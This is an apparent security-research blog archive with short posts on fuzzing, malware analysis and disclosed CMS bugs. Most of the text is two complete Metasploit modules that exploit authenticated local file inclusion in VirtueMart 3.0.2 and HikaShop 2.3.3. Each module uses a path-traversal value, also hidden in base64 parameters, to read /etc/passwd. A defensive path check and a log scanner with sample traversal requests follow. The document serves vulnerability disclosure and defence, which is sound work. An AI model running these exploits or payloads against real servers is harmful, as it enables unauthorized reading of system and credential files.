(I wrote this as a 'note' on 14.12.2015, but since all the information is already public,
below you will find a proof of concept and a little write-up for the vulnerability described in this CVE.)
Sunday, 27 December 2015
Saturday, 26 December 2015
New version of Lime Survey
As far as I know LimeSurvey is already updated, so below you will find all the vulnerabilities I found nearly 2 months ago during some small 'code review' exercises.
Response from LimeSurvey Team was very fast! :)
Found: 4.11.2015
Sent: 5.11.2015
Resp: 5.11.2015
AFAIK all findings were fixed in 48h. So... here we go:
Saturday, 24 October 2015
[EN] SOAP testing
During one of my last projects I needed to test some web services.
I was wondering: if I can do it with Burp or by manual testing,
maybe I can also write some quick code in Python...
And that's how I wrote soapee.py:
Friday, 2 October 2015
My Java SIGSEGV's
During the last couple of days I was checking lcamtuf's American Fuzzy Lop against some ("non-instrumented") binaries.
I was looking for some sources, but unfortunately I wasn't able to find any. The next thing was checking where I have Java installed (so I would know what/where I can check). My kind of 'test lab' was: Ubuntu 12, Kali Linux, WinXP, Win7. (The exact versions of Java installed on those OS's you will find below.)
Friday, 19 June 2015
[EN] Social engineering attacks during conference in Katowice
Thanks for watching and all questions during this conference ;)
It was a great energy!
More details: http://www.tuv-nord.com/pl/pl/aktualnosci-436-1921.htm
See you next time.
o/
Wednesday, 27 May 2015
SQLI in e107 CMS
During the last few weeks, in between other things, I was also doing some source code review.
That's how I found an SQLi bug in the admin panel of e107 CMS. After a fast response from the e107 Team,
a fix was created.
This bug was found in the e107_2.0_full_beta1 version. I don't know if other versions are also vulnerable.
Details about the vulnerability (even though it's in the admin panel) will not be published for now.
Stay in touch. ;)
Monday, 25 May 2015
[EN] Browser exploitation during CybercomDev conference - Updated
During this weekend I gave my first formal security presentation at CybercomDev in Poland.
I was talking about use-after-free exploits, fuzzing and browser exploitation.
Thank you for watching and for your support ;)
* Currently this presentation is available only on demand.
* Update - 16.07.2015 *
Video (PL) is available here. Thanks Kenis. ;)
See you next time! ;)
o/
Labels: art, browser exploitation, conference, exploit, fuzzing, Metasploit, RE, research
Tuesday, 28 April 2015
[EN] Old nasm sigsegv 0day
[EN] Flex 2.5.33 (2) 0days
I was testing some old bugs in one old distro, and that's how I found a sigsegv in flex (2.5.33).
Below is the proof of concept:
Monday, 2 March 2015
[EN] Analysing malicious PDF - part 2
This time we will check 2 PDFs (because I decided it will be more fun than just posting about one ;)). Besides that, those 2 files contain different methods for delivering the payload, so we will check all of them.
Sunday, 1 March 2015
[EN] Analyzing Malicious PDF
Reading the Contagio Blog I found a few examples of malicious PDF files.
Today we will check one of them. :)
During PDF analysis we will often use peepdf and Malzilla.
This time too, those tools will help us understand what's going on with
our PDF file.
Let's run peepdf on this file. As we can see there is some JavaScript object.
Let's examine it with the "object 7" command:
[EN] Obfuscated case - JSredirector
Today we'll check some "obfuscated" JavaScript code. I found this example (named
'JSredirector') on this site. Thanks again! ;)
So... Unzip the file and you will find index.html with JS code.
index.html contains encoded JS code:
Labels: art, code review, exploit, malware, obfuscation, RE, research
Tuesday, 24 February 2015
[EN] Malware analysis – Fake AV Downloader (part 1)
1. Thanks for the sample file(s)
After writing my last article about malware analysis for Android[1], I decided to check some threats that may come from webpages. Today we see more advertisements on the web than we did a few years ago. In the case of malicious pages, the "advertisements" added there will now more often try to steal your data by installing some malware on your computer or by redirecting you to a webpage containing exploit code for your browser (or its plugin).
A few nice examples of 'webpages' like this I found (again) on Mila's great blog[0]. Thanks again! ;)
(Hint: Don't ask me for the password. Ask Mila via email.)
[EN] Fun with American Fu(n)zzy Lop
In the last few days I was doing a little research about 'how this crazy afl works'. ;)
"American Fuzzy Lop" is an excellent tool created by lcamtuf.
Now is a good moment to check the documentation of 'afl' if you want
some nice details about using it.
Wednesday, 28 January 2015
[PL] Analiza aplikacji atticlab.bodyscanner.apk
In this short post I will explain how I checked what the atticlab.bodyscanner.apk application does. I found the file while browsing http://contagiodump.blogspot.com/ [1]
- thanks for the samples!
Table of contents:
Sunday, 18 January 2015
[EN] kmt.apk - what's this?
A few days ago I found an Android application named 'kmt.apk'.
I was wondering what this app is doing... To check it, I used apktool.
Listing the files showed me AndroidManifest.xml, so I was hoping to find out
what this app needs to run. This is what I found:
(screenshot: AndroidManifest.xml)
After checking that this app needs my location (or the location of my phone),
I was curious where (all?) those data are going. This is what I found:
(screenshot: jd-gui in action)
(screenshot: jd-gui in action - sending params...)
Another one:
(screenshot: onCreate function)
And that's how I found this link :)
So it seems that this application is checking information about the location of your
phone and sending it to this "erotte" web. For now we're done here. ;)
If you have some nice APK files to analyse, let me know via email. Thanks.
Cheers,
o/
[EN] Checking Illusion Bot
I was checking other stuff, and suddenly found "Illusion Bot". Seems to be a small IRC DDoS Bot. ;]
Let's see...
Download:
(screenshot: You can easily find it on the web)
Unzipped it looks like this:
(screenshot: Unzipped)
I decided to check the web files first... but I don't understand all of it... ;]
(screenshot: Sorry - don't understand)
So I decided to use the nice and friendly 'strings' command, connected with a few greps:
(screenshot: Commands to use for this bot)
Of course in those PHP files (index.php and upgrade.php) you can find more things, like
how this backdoor installs itself on the WWW server, how it sends commands, etc.
Base64-decoded files now look like this:
(screenshot: Bots tables)
...and commands again:
Point of view from IDA:
And this is my favourite :D
(screenshot: can you see it? ;))
More, maybe soon. ;)
Cheers,
o/
Monday, 12 January 2015
[EN] VirtueMart 3 - LFI for Metasploit
Following the last few posts, below you can find another small PoC exploit for the LFI vulnerability found in the latest (this time) VirtueMart (3.0.2).
Because it's for Joomla again, again it's based on the HikaShop LFI PoC.
Enjoy:
(screenshot: Preparing to exploit...)
(screenshot: Raw results)
And the code:
---<virtuemart_auth_lfi.rb>---
root@kali:/var/www# cat virtuemart_lfi.rb
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit4 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'VirtueMart 3 - LFI poc for authenticated users',
      'Description'    => %q{
        VirtueMart 3.0.2 is vulnerable to local file include attack.
        Authenticated user can read local files from the server.
        More here: https://twitter.com/HauntITBlog
      },
      'Author'         =>
        [
          'HauntIT Blog', # Discovery
          # MSF module (based on http://hauntit.blogspot.com/2015/01/en-hikashop-lfi-metasploit-module.html)
          'http://hauntit.blogspot.com'
        ],
      'License'        => MSF_LICENSE,
      'Privileged'     => false,
      'Platform'       => ['php'],
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Automatic', { } ],
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Dec 23 2014'))   # MSF expects "Mon DD YYYY" here (originally ' 23.12.2014')

    register_options(
      [
        OptString.new('TARGETURI', [ true, "Base Joomla directory path", 'joomla']),
        OptString.new('USERNAME',  [ true, "Username to authenticate with", 'admin']),
        OptString.new('PASSWORD',  [ false, "Password to authenticate with", 'admin']),
      ], self.class)
  end

  def check
    # no fingerprinting in this poc
    Exploit::CheckCode::Unknown
  end

  # Joomla's CSRF token is a 32-char hex string used as the name of a hidden input
  def fetchMd5(my_string)
    if my_string =~ /([0-9a-fA-F]{32})/
      return $1
    end
    return nil
  end

  def exploit
    # 1st, we will get cookies and token
    req1 = send_request_cgi({
      'method' => 'GET',
      'uri'    => normalize_uri(target_uri.path, 'administrator', 'index.php')
    })
    # check the response before reading anything from it
    unless req1
      fail_with(Failure::Unreachable, "[-] Failed with 1st request")
    end
    # cookie string in the form send_request_cgi expects back
    cookies = req1.get_cookies
    print_status("[+] Good: " + req1.code.to_s)
    print_good("[+] Got cookie(s): " + cookies)

    token_pattern = /(<input type=\"hidden\" name=\"[a-zA-Z0-9]*\" value=\"1\")/
    token = nil
    if req1.body =~ token_pattern
      token = fetchMd5(req1.body)
      print_good("[+] Got token: " + token.to_s)
    end
    # without the token the login POST below cannot succeed, so stop here
    fail_with(Failure::NotFound, "[-] Token not found") if token.nil?

    # now we need to do auth using that token and cookies
    print_status("[+] Trying to auth...")
    auth = send_request_cgi({
      'method'    => 'POST',
      'uri'       => normalize_uri(target_uri.path, 'administrator', 'index.php'),
      'cookie'    => cookies,
      'vars_post' => {
        'username' => datastore['USERNAME'],
        'passwd'   => datastore['PASSWORD'],
        'option'   => 'com_login',
        'task'     => 'login',
        'return'   => 'aW5kZXgucGhwP29wdGlvbj1jb21fdmlydHVlbWFydCZ2aWV3PWxvZyZ0YXNrPWVkaXQmbG9nZmlsZT0uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi9ldGMvcGFzc3dk',
        token.to_s => 1
      }
    })
    unless auth
      fail_with(Failure::Unreachable, "[-] Failed with auth request")
    end
    print_good("[+] Code after auth: " + auth.code.to_s)

    # 3rd step: get + post params to lfi
    print_good('[+] Exploit...')
    readthis = "../../../../../../../../../../../../../../../../../../etc/passwd"
    xpl = send_request_cgi({
      'method'   => 'GET',
      'uri'      => normalize_uri(target_uri.path, 'administrator', 'index.php'),
      'vars_get' => {
        'option'  => 'com_virtuemart',
        'view'    => 'log',
        'task'    => 'edit',
        'logfile' => readthis
      },
      'cookie'   => cookies
    })
    if xpl
      print_good("[+] Exploit response code: " + xpl.code.to_s)
      print_good("[+] Response body after attack:")
      print_status(xpl.body)
    else
      fail_with(Failure::Unknown, "[-] Cannot exploit it :C")
    end
  end # exploit
end
---<virtuemart_auth_lfi.rb>---
Pastebin version is here.
Cheers,
o/
Saturday, 3 January 2015
[EN] HikaShop LFI - Metasploit module
Nearly 2 weeks ago I wrote a little article about vulnerabilities in multiple plugins for Joomla.
There we talked about creating your own proof-of-concept for Metasploit. So now it should be a good time to prepare something more useful.
Below you will find a dirty MSF PoC for the LFI vulnerability located in HikaShop 2.3.3. ;)
Let me know if your Joomla is vulnerable. ;) If you have any trouble running this PoC,
just check how I've done it before or feel free to contact me with any questions/suggestions.
Loading the exploit:
Running:
... and finally we will get the content of /etc/passwd:
Code:
---<hikashop_auth_lfi.rb>---
root@kali:/var/www/pocs# cat hikashop_auth_lfi.rb
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit4 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'HikaShop - LFI poc for authenticated users',
      'Description'    => %q{
        HikaShop 2.3.3 is vulnerable to local file include attack.
        Authenticated user can read local files from the server.
        Vulnerability was described on https://twitter.com/HauntITBlog
      },
      'Author'         =>
        [
          'HauntIT Blog', # Discovery / msf module
          'http://hauntit.blogspot.com'
        ],
      'License'        => MSF_LICENSE,
      'Privileged'     => false,
      'Platform'       => ['php'],
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Automatic', { } ],
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Jan 03 2015'))   # MSF expects "Mon DD YYYY" here (originally '03.01.2015')

    register_options(
      [
        OptString.new('TARGETURI', [ true, "Base Joomla directory path", 'joomla']),
        OptString.new('USERNAME',  [ true, "Username to authenticate with", 'admin']),
        OptString.new('PASSWORD',  [ false, "Password to authenticate with", 'admin']),
        # registered but not used by this poc
        OptRegexp.new('FAILPATTERN', [ false, 'Pattern returned in response if login failed', '/error/'] ),
      ], self.class)
  end

  def check
    # no fingerprinting in this poc
    Exploit::CheckCode::Unknown
  end

  # Joomla's CSRF token is a 32-char hex string used as the name of a hidden input
  def fetchMd5(my_string)
    if my_string =~ /([0-9a-fA-F]{32})/
      return $1
    end
    return nil
  end

  def exploit
    # 1st, we will get cookies and token
    req1 = send_request_cgi({
      'method' => 'GET',
      'uri'    => normalize_uri(target_uri.path, 'administrator', 'index.php')
    })
    # check the response before reading anything from it
    unless req1
      fail_with(Failure::Unreachable, "[-] Failed with 1st request")
    end
    # cookie string in the form send_request_cgi expects back
    cookies = req1.get_cookies
    print_status("[+] Resp code: " + req1.code.to_s)
    print_good("[+] Cookie(s) : " + cookies)

    token_pattern = /(<input type=\"hidden\" name=\"[a-zA-Z0-9]*\" value=\"1\")/
    token = nil
    if req1.body =~ token_pattern
      token = fetchMd5(req1.body)
      print_good("[+] Token : " + token.to_s)
    end
    # without the token the login POST below cannot succeed, so stop here
    fail_with(Failure::NotFound, "[-] Token not found") if token.nil?

    # now we need to do auth using that token and cookies
    print_status("[+] 2nd request (post with auth)")
    auth = send_request_cgi({
      'method'    => 'POST',
      'uri'       => normalize_uri(target_uri.path, 'administrator', 'index.php'),
      'cookie'    => cookies,
      'vars_post' => {
        'username' => datastore['USERNAME'],
        'passwd'   => datastore['PASSWORD'],
        'option'   => 'com_login',
        'task'     => 'login',
        'return'   => 'aW5kZXgucGhwP29wdGlvbj1jb21faGlrYXNob3AmY3RybD12aWV3JnRhc2s9ZWRpdCZpZD0wfGJlZXozfGNvbXBvbmVudHxjb21faGlrYXNob3B8YWRkcmVzc3wuLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi9ldGMvcGFzc3dk',
        token.to_s => 1
      }
    })
    unless auth
      fail_with(Failure::Unreachable, "[-] Failed with auth request")
    end
    print_good("[+] Code after auth: " + auth.code.to_s)

    # 3rd step: get + post params to lfi
    print_status('[+] and now 3rd request...')
    xpl = send_request_cgi({
      'method'   => 'GET',
      'uri'      => normalize_uri(target_uri.path, 'administrator', 'index.php'),
      'vars_get' => {
        'option' => 'com_hikashop',
        'ctrl'   => 'view',
        'task'   => 'edit',
        'id'     => '0|beez3|component|com_hikashop|address|../../../../../../../../../../../../../../../../../../etc/passwd'
      },
      'cookie'   => cookies
    })
    if xpl
      print_good("[+] 3rd response code: " + xpl.code.to_s)
      print_good("[+] 3rd (full) response body:")
      print_status(xpl.body)
    else
      fail_with(Failure::Unknown, "[-] Cannot exploit it :C")
    end
  end # exploit
end
---<hikashop_auth_lfi.rb>---
And pastebin version is here.
Happy New Year! ;)
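Both Metasploit modules on this page work the same way: an authenticated request hands the component a file name (VirtueMart's logfile parameter, the last pipe-separated field of HikaShop's id parameter) that the component opens without checking where it resolves. The Ruby below is an added example, not part of this post and not code from VirtueMart, HikaShop or the Metasploit framework, showing the defender's side of that pattern: the containment check the handlers were missing, and a scanner that flags the same traversal in a web server access log, including percent-encoded, double-encoded and backslash forms beyond the plain ../ used above. ALLOWED_LOG_DIR, the /joomla path and every log line are constructed for the example.

```ruby
# Added example: not part of the original post and not code from the
# VirtueMart/HikaShop projects or from the Metasploit modules above.
# Two defender-side pieces for the LFI pattern this post demonstrates:
#   1. path_within_base: the check the abused 'logfile' / 'id' handlers lacked.
#      Resolve the requested name against the one directory that is allowed
#      and reject anything that escapes it.
#   2. scan_access_log: find requests in a web server access log whose query
#      string carries a traversal sequence (plain or URL-encoded) in the
#      parameters these PoCs use.
# ALLOWED_LOG_DIR and every log line below are constructed for this example.
require 'cgi'

ALLOWED_LOG_DIR = "/var/www/joomla/logs"  # assumption: where the app keeps its logs

# Returns the absolute path if `requested` resolves inside `base`, else nil.
def path_within_base(requested, base = ALLOWED_LOG_DIR)
  return nil if requested.nil? || requested.empty?
  # NUL bytes and a leading "~" both change what expand_path / the filesystem would open
  return nil if requested.include?("\0") || requested.start_with?("~")
  base_abs  = File.expand_path(base)
  # expand_path collapses "." and ".." segments, so a request that climbs out of
  # `base` ends up as a path that no longer starts with base_abs + "/".
  candidate = File.expand_path(requested, base_abs)
  candidate.start_with?(base_abs + File::SEPARATOR) ? candidate : nil
end

# Query parameters abused by the two PoCs in this post, keyed to their component.
WATCHED_PARAMS = { "logfile" => "com_virtuemart", "id" => "com_hikashop" }

# "../" or "..\" (matched after percent-decoding)
TRAVERSAL = %r{\.\.[/\\]}

# Apache/nginx "combined" log format, up to the response size field.
LOG_LINE = /\A(?<ip>\S+) \S+ \S+ \[(?<time>[^\]]+)\] "(?<method>\S+) (?<target>\S+) [^"]*" (?<status>\d{3}) (?<size>\S+)/

# True if the value contains a traversal sequence after undoing up to two
# rounds of percent-encoding (double encoding is a common filter bypass).
def traversal?(value)
  return false if value.nil?
  decoded = value
  2.times { decoded = CGI.unescape(decoded) }
  !!(TRAVERSAL =~ decoded)
end

# Returns one hash per suspicious request: line number, client, component, parameter, value.
def scan_access_log(lines)
  findings = []
  lines.each_with_index do |line, idx|
    m = LOG_LINE.match(line)
    next unless m
    path, query = m[:target].split("?", 2)
    next unless query && path.end_with?("/administrator/index.php")
    params = CGI.parse(query)                 # values come back as arrays, decoded once
    option = Array(params["option"]).first
    WATCHED_PARAMS.each do |name, component|
      next unless option == component
      value = Array(params[name]).first
      next unless traversal?(value)
      findings << { line: idx + 1, ip: m[:ip], status: m[:status].to_i,
                    component: component, param: name, value: value }
    end
  end
  findings
end

# Constructed sample: one legitimate log view, the two traversal patterns from
# this post (the second one percent-encoded), an unrelated request, and junk.
SAMPLE_LOG = [
  '10.0.0.5 - - [12/Jan/2015:10:01:02 +0100] "GET /joomla/administrator/index.php?option=com_virtuemart&view=log&task=edit&logfile=error.log HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
  '10.0.0.9 - - [12/Jan/2015:10:03:15 +0100] "GET /joomla/administrator/index.php?option=com_virtuemart&view=log&task=edit&logfile=../../../../../../etc/passwd HTTP/1.1" 200 2311 "-" "Mozilla/5.0"',
  '10.0.0.9 - - [12/Jan/2015:10:04:40 +0100] "GET /joomla/administrator/index.php?option=com_hikashop&ctrl=view&task=edit&id=0|beez3|component|com_hikashop|address|%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.1" 200 2290 "-" "Mozilla/5.0"',
  '10.0.0.7 - - [12/Jan/2015:10:05:00 +0100] "GET /joomla/index.php?option=com_content&id=../42 HTTP/1.1" 200 8000 "-" "Mozilla/5.0"',
  'this line is not in combined format',
]

if __FILE__ == $0
  scan_access_log(SAMPLE_LOG).each do |f|
    puts "line #{f[:line]}: #{f[:ip]} hit #{f[:component]} with #{f[:param]}=#{f[:value]} (HTTP #{f[:status]})"
  end
end
```

The scanner keys on the exact option/parameter pairs these two PoCs use so that an ordinary id=42 elsewhere in Joomla does not fire; a 200 status on a flagged line is the signal that the read probably succeeded. path_within_base compares against base plus a trailing separator on purpose, so a sibling directory such as logs_old is rejected too.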